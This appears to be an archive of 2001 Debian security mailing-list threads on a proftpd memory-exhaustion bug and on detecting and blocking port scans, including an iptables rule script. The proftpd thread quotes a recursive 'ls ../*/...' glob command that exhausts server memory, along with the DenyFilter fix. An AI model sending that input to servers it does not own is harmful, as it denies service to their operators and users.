There was a discussion on this on the proftpd mailing list. Go to www.proftpd.org and check the archives. If I can dredge the answer up from old saved email I'll post here. You might also want to join that mailing list for help on this and future issues. At 07:15 PM 5/24/2001 +0100, Zak Kipling wrote: On Thu, 24 May 2001, Andres Herrera wrote: I've tried to exploit it by login and sending: ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../ and suddenly it began eating memory and getting slow all the system. ... Any solution?? Resource limits on the ftp server process? Zak. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- Eric N. Valor Webmeister/Inetservices Lutris Technologies [EMAIL PROTECTED] - This Space Intentionally Left Blank -
Re: proftpd exploit??
Zak Kipling wrote: On Thu, 24 May 2001, Andres Herrera wrote: I've tried to exploit it by login and sending: ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../ and suddenly it began eating memory and getting slow all the system. ... Any solution?? Resource limits on the ftp server process? Or a DenyFilter of \*.*/ as is recommended on the proftpd.org web site. http://www.proftpd.org/critbugs.html -- Jamie Heilman http://audible.transient.net/~jamie/ ...thats the metaphorical equivalent of flopping your wedding tackle into a lion's mouth and flicking his lovespuds with a wet towel, pure insanity... -Rimmer
Re: proftpd exploit??
Zak Kipling wrote: On Thu, 24 May 2001, Andres Herrera wrote: I've tried to exploit it by login and sending: ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../ and suddenly it began eating memory and getting slow all the system. ... Any solution?? Resource limits on the ftp server process? what about PathDenyFilter? robt
Re: strange log entry
On Thu, May 24, 2001 at 07:33:44AM +, Jim Breton wrote: On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote: the last two i understand, as well as domain, but sunrpc and 1171? man fuser. Look for the -n option. ... or look for -p option of netstat :) Mirek
Re: proftpd exploit??
Hi!! Thanks to everybody (and sorry for my english 0:) ) I've choosed the DenyFilter option and everything goes OK again :- The user just get and Forbidden command argument message. ... and certainly I'm subcribing my account to the proftpd mailing list ;-) Thanks again -- 101 Things you do NOT want your System Administrator to say. 94. ...and after I patched the microcode... -- Cagarruta [EMAIL PROTECTED] Linux Reg. User #66054 --
detecting portscanning
Hello Everyone, It is my first time i'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many. Is there a package for it in debian? Or do I have to install something else. Thanks in advance, Rudy -- ___ _ _ ___ |_ / / _ \| | | |/ __| e:[EMAIL PROTECTED] phone: 0486/690159 / / | __/| |_| |\__ \ url: http://studwww.rug.ac.be/~rgevaert/ /___| \___| \__,_||___/ http://zeus.rug.ac.be
Re: detecting portscanning
On Thu, 24 May 2001, Rudy Gevaert wrote: Hello again, Some people suggested ippl, I installed it, and it runs. It works :-) Some other people, said I should use portsentry. And I look for it on the website, and it is a tar.gz file, but in the unstable section I can find a deb file. But I'm using stable. Will this give any problems? Or can I just download it? I think I will have to add a line to my apt-get config file. Right? Again, thanks in advance, Rudy -- ___ _ _ ___ |_ / / _ \| | | |/ __| e:[EMAIL PROTECTED] phone: 0486/690159 / / | __/| |_| |\__ \ url: http://studwww.rug.ac.be/~rgevaert/ /___| \___| \__,_||___/ http://zeus.rug.ac.be
Re: detecting portscanning
On Thursday 24 May 2001 14:01, Rudy Gevaert wrote: On Thu, 24 May 2001, Rudy Gevaert wrote: Hello again, Some people suggested ippl, I installed it, and it runs. It works :-) Some other people, said I should use portsentry. And I look for it on the website, and it is a tar.gz file, but in the unstable section I can find a deb file. But I'm using stable. Will this give any problems? Or can I just download it? I think I will have to add a line to my apt-get config file. Right? Again, thanks in advance, Rudy The problem with portsentry is that it binds to all the ports you are watching, so people that are scanning actually see those ports open. It is better to use snort, which will let you know that the scans have happened without the attacker being aware.
Re: detecting portscanning
The problem with portsentry is that it binds to all the ports you are watching, so people that are scanning actually see those ports open. It is better to use snort, which will let you know that the scans have happened without the attacker being aware. Although it binds to all the ports portsentry can blackhole the scanner as soon as it detects it with an IP chains rule. Once the user starts a scan they will be immediately blackholed and will never even complete the scan. :wq Tim Uckun Due Diligence Inc. http://www.diligence.com/Americas Background Investigation Expert. If your company isn't doing background checks, maybe you haven't considered the risks of a bad hire.
RE: detecting portscanning
Hello, there's several methods to tell that. a) use a product like portsentry b) use iptables/ipchains to reject all forms of portscans c) don't connect the box to the inet as portscans are a fact of life ;) portsentry will trashcan any system that attempts to portscan you. If your using 2.2.x you may want to put on the stealth kernel patch (freshmeat.net search for stealth) that helps hinder scans iptables has an awsome mechanism for portscans ;) in fact you can set it up so that all portscans (well most I should say) will literaly take HOURS to return nothing. Ed -Original Message- From: Rudy Gevaert [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 4:17 PM To: debian-security@lists.debian.org Subject: detecting portscanning Hello Everyone, It is my first time i'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many. Is there a package for it in debian? Or do I have to install something else. Thanks in advance, Rudy -- ___ _ _ ___ |_ / / _ \| | | |/ __| e:[EMAIL PROTECTED] phone: 0486/690159 / / | __/| |_| |\__ \ url: http://studwww.rug.ac.be/~rgevaert/ /___| \___| \__,_||___/ http://zeus.rug.ac.be -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: detecting portscanning
On Thu, 24 May 2001, Ed Street wrote: Hello, there's several methods to tell that. a) use a product like portsentry b) use iptables/ipchains to reject all forms of portscans c) don't connect the box to the inet as portscans are a fact of life ;) portsentry will trashcan any system that attempts to portscan you. If your using 2.2.x you may want to put on the stealth kernel patch (freshmeat.net search for stealth) that helps hinder scans iptables has an awsome mechanism for portscans ;) in fact you can set it up so that all portscans (well most I should say) will literaly take HOURS to return nothing. Ok thanks, I'll use iptable when I got my network running. Now it is just a standalone box. I'm running ippl and it logs the most things. It will work for now I think ;) Thanks to everyone for all the help! Greetings, Rudy -- ___ _ _ ___ |_ / / _ \| | | |/ __| e:[EMAIL PROTECTED] phone: 0486/690159 / / | __/| |_| |\__ \ url: http://studwww.rug.ac.be/~rgevaert/ /___| \___| \__,_||___/ http://zeus.rug.ac.be
RE: detecting portscanning
# echo Rejecting Portscans # # #Reject Xms Scans # # Generic dirty interface maping $IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j LOG \ --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP # This disallows ALL portscans that will hit the PREROUTING table $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j LOG \ --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP # # #Reject Fin scans # $IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN -m state --state ! ESTABLISHED \ -j LOG --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN -m state --state ! ESTABLISHED -j DROP # This disallows ALL portscans that will hit the PREROUTING table $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN \ -j LOG --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN -j DROP # # # Reject ANY station that opens and immediately closes a connection # Some portscanners does this # $IPTABLES -A INPUT -p tcp --tcp-flags ALL SYN,FIN -j LOG \ --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -A INPUT -p tcp --tcp-flags ALL SYN,FIN -j DROP $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN \ -j LOG --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN -j DROP # # # invalid crap # $IPTABLES -t mangle -A PREROUTING -j LOG --log-level $LOG_LEVEL \ -m state --state INVALID \ -m limit --limit $LIMIT_RATE # This isn't complete as the SYN scan will still get thru BUT it will take ages to show anything. Also use of rp_filter ('spoof' protection) helps out to. Ed -Original Message- From: S.Salman Ahmed [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 8:11 PM To: debian-security@lists.debian.org Subject: RE: detecting portscanning Ed == Ed Street [EMAIL PROTECTED] writes: Ed Ed iptables has an awsome mechanism for portscans ;) in fact you Ed can set it up so that all portscans (well most I should say) Ed will literaly take HOURS to return nothing. Ed What iptables rule(s) would cause that behaviour ? -- Salman Ahmed ssahmed AT pathcom DOT com -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: detecting portscanning
On Thu, May 24, 2001 at 03:47:33PM -0600, Tim Uckun wrote: The problem with portsentry is that it binds to all the ports you are watching, so people that are scanning actually see those ports open. It is better to use snort, which will let you know that the scans have happened without the attacker being aware. Although it binds to all the ports portsentry can blackhole the scanner as soon as it detects it with an IP chains rule. Once the user starts a scan they will be immediately blackholed and will never even complete the scan. Don't do that unless you know what you are doing. If somebody fakes a portscan coming from somewhere you really wouldn't want to blackhole (e.g. your name server), you could lose bigtime. If you know what you're doing, and understand the risks, then do whatever tickles your fancy. Just be careful about suggesting potentially dangerous stuff. -- #define X(x,y) x##y Peter Cordes ; e-mail: X([EMAIL PROTECTED] , ns.ca) The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces! -- Plautus, 200 BCE
Re: detecting portscanning
Hello, --- Rudy Gevaert [EMAIL PROTECTED] wrote: It is my first time i'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many. Is there a package for it in debian? Or do I have to install something else. Check out www.snort.org. Snort capable to detect portscans. Note, that not only portscans, but other strange activities (i.e. tracing, os fingerprinting, etc) and attacks. You can download sources from original site or get *.deb from debian (it included into latest release). = Regards, Vladislav. --- http://cybervlad.port5.com __ Do You Yahoo!? Yahoo! Auctions - buy the things you want at great prices http://auctions.yahoo.com/